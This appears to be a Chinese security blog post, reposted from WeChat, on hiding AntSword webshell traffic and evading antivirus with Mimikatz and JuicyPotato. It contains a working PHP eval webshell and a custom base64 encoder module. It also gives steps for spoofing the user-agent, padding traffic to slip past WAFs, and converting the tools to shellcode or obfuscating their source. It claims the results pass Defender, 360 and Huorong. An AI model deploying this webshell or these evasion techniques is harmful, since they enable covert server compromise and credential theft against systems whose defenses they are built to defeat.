前言：摸鱼玩了几天是真的玩的那种笑死 啥都没学

本来说大前天就把这玩意整完的 几天就干了一点事情

其中cs的一些东西和frp改造还没玩明白 不过暂时就这样吧   内核的很多还是玩不明白 先放着吧以后在学了

摸鱼玩其他的去

正文：

蚁剑隐藏特征+自定义编码器

正常蚁剑的几个特征

①user-agent流量特征

②shellcode未加密流量特征

后面补的所有上面的useragent已经被改了

改造

①shellcode未加密流量特征思路

一个编码项目

https://codeload.github.com/xiaopan233/AntSword-Cryption-WebShell/zip/refs/heads/main

base64思路

这里以最基础的base64加密为例

新加一个编码器 然后内容如下即可

/** * php::base64编码器 * Create at: 2018/12/29 09:12:22 */
'use strict';
/** @param  {String} pwd   连接密码* @param  {Array}  data  编码器处理前的 payload 数组* @return {Array}  data  编码器处理后的 payload 数组*/module.exports = (pwd, data) => {    data[pwd] = new Buffer(data['_']).toString('base64');  delete data['_'];  // 返回编码器处理后的 payload 数组  return data;}

shellcode代码

<?php @eval(base64_decode($_POST['shell'])); ?>

蚁剑自带rsa加密

copy php代码然后正常连接即可

然后把shellcode扔服务器上 然后进行配置编码器设置为我们设置的那个即可

②更改user-agent

更改module文件下的  这两个文件内容即可

改成我们想伪造的即可 然后重启即可

③其余自选功能

加点垃圾数据和分块这些去过一些垃圾waf

这样一来神仙都难说是

这个去配置urlblacklist 把要过滤的删了改了即可

猕猴桃免杀

这里只分享思路 不放东西

将猕猴桃的exe做个简单免杀然后exe转shellcode 然后就变成我们常规使用的分离加载以及编码加解密shellcode免杀的思路了

有人说猕猴桃走源码免杀

不是说不可以 但是咋说呢 耗时间 特征定位耗费一堆时间哪怕用myccl去做特征定位 我也觉得蛮耗时间的 而且特征这块火绒杀的蛮死的 对我来说能转换为其他思路做就绝不用这种

没开启样本上传的360倒是可以不杀

juicepotao免杀

这种其实也可以转shellcode然后走分离 但是考虑到具体版本clsid不灵活的特点

我这里没想出其他的多好的思路，还是走的源码免杀 就是常规的替换参数替换资源混淆代码执行逻辑

效果如下

wdf+360+火绒全过

原文始发于微信公众号（goddemon的小屋）：工具绕防